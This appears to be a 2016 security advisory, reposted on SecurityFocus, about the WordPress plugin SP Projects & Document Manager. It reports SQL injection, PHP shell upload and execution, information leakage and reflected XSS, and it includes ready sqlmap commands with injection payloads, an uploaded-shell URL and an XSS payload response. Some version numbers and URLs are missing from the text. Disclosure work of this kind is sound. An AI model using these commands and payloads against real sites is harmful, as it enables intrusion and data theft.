Multiple vulnerabilities in Wordpress plugin SP Projects & Document Manager Mar 06 2016 01:45PM
mail michaelhelwig de
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version:
* Tested on: WordPress 4.4.1
* Category: webapps


The Wordpress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
sql injections, information leakage and xss by unregistered users.


1. SQL-Injections

Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version

- The injections in the "id"-parameter on

- and the POST-Parameter vendor_email on

See https://packetstormsecurity.com/files/129212/ WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document -manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document -manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) OR (1=1 *" --dbms mysql

2. Arbitrary code executions

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like


http://wordpress.local.de/wp-content/uploads/sp-client-document-manager /1/shell.php

Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.

3. Information leakage

Information about uploaded files can be retrieved by non-logged in users via a
call to admin/ajax.php:

GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/

-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json

"1","cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0","form_id":"0","entry_id":"0","group_id":"0","clie

Specifically you can retrieve info about the upload user id and filename
to determine the URL for direct access to the file (see 3).

4. XSS Vulnerability

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:

POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager /admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded

-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);</script></p>


2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update - issues fixed


Update to latest version

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus